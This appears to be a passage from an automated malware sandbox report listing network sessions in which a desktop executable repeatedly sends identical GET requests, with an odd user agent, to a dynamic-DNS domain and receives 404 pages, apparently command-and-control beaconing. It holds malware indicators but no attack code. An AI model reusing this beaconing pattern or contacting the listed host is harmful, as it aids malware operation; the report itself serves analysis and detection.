                Session IDSource IPSource PortDestination IPDestination PortProcess
                161192.168.2.649959208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:24 UTC68OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:24 UTC68INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:24 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:24 UTC68INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                162192.168.2.649960208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:24 UTC68OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:24 UTC68INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:24 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:24 UTC68INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                163192.168.2.649961208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:24 UTC68OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:24 UTC69INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:24 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:24 UTC69INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                164192.168.2.649962208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:24 UTC69OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:24 UTC69INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:24 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:24 UTC69INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                165192.168.2.649963208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:25 UTC69OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:25 UTC69INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:25 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:25 UTC70INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                166192.168.2.649964208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:25 UTC70OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:25 UTC70INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:25 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:25 UTC70INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                167192.168.2.649965208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:25 UTC70OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:25 UTC70INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:25 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:25 UTC70INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                168192.168.2.649966208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:25 UTC71OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:25 UTC71INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:25 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:25 UTC71INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                169192.168.2.649967208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:26 UTC71OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:26 UTC71INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:26 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:26 UTC71INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                17192.168.2.649781208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:49 UTC7OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:49 UTC7INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:49 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:49 UTC7INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                170192.168.2.649968208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:26 UTC71OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:26 UTC72INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:26 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:26 UTC72INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                171192.168.2.649969208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:26 UTC72OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:26 UTC72INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:26 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:26 UTC72INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                172192.168.2.649970208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:26 UTC72OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:26 UTC72INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:26 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:26 UTC73INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                173192.168.2.649971208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:27 UTC73OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:27 UTC73INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:27 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:27 UTC73INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                174192.168.2.649972208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:27 UTC73OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:27 UTC73INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:27 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:27 UTC73INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                175192.168.2.649973208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:27 UTC73OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:27 UTC74INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:27 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:27 UTC74INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                176192.168.2.649974208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:27 UTC74OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:27 UTC74INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:27 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:27 UTC74INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                177192.168.2.649975208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:28 UTC74OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:28 UTC74INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:28 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:28 UTC75INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                178192.168.2.649976208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:28 UTC75OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:28 UTC75INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:28 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:28 UTC75INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                179192.168.2.649977208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:28 UTC75OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:28 UTC75INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:28 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
